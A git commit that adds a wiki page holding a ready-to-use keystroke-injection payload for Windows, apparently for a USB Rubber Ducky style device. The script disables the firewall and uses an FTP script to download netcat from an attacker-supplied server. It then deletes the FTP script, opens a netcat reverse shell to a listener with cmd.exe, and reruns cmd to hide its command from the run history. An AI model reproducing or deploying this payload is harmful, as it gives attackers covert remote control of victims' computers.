Payload netcat FTP download and reverse shell

2017-03-02 16:47:37 -03:00 · 2017-03-02 16:47:37 -03:00 · c93000ee6a
parent 6c88645e34
commit c93000ee6a
1 changed files with 56 additions and 0 deletions
--- a/Payload-netcat-FTP-download-and-reverse-shell.md
+++ b/Payload-netcat-FTP-download-and-reverse-shell.md
@ -0,0 +1,56 @@
+This script will:
+* create an FTP script that logs you in to the FTP server and download netcat
+* delete the FTP script file
+* run netcat in daemon mode
+* run cmd.exe one more time to conceal the command we used in the run history.
+
+Fill in the required information where you see the brackets.
+```c
+DELAY 10000
+GUI r
+DELAY 200
+STRING cmd
+ENTER
+DELAY 600
+STRING cd %USERPROFILE%
+ENTER
+DELAY 100
+STRING netsh firewall set opmode disable
+ENTER
+DELAY 2000
+STRING echo open [IP] [PORT] > ftp.txt
+ENTER
+DELAY 100
+STRING echo [USERNAME]>> ftp.txt
+ENTER
+DELAY 100
+STRING echo [PASSWORD]>> ftp.txt
+ENTER
+DELAY 100
+STRING echo bin >> ftp.txt
+ENTER
+DELAY 100
+STRING echo get nc.exe >> ftp.txt
+ENTER
+DELAY 100
+STRING echo bye >> ftp.txt
+ENTER
+DELAY 100
+STRING ftp -s:ftp.txt
+ENTER
+STRING del ftp.txt & exit
+ENTER
+DELAY 2000
+GUI r
+DELAY 200
+STRING nc.exe [LISTENER IP] [LISTENER PORT] -e cmd.exe -d
+ENTER
+DELAY 2000
+GUI r
+DELAY 200
+STRING cmd
+ENTER
+DELAY 600
+STRING exit
+ENTER
+```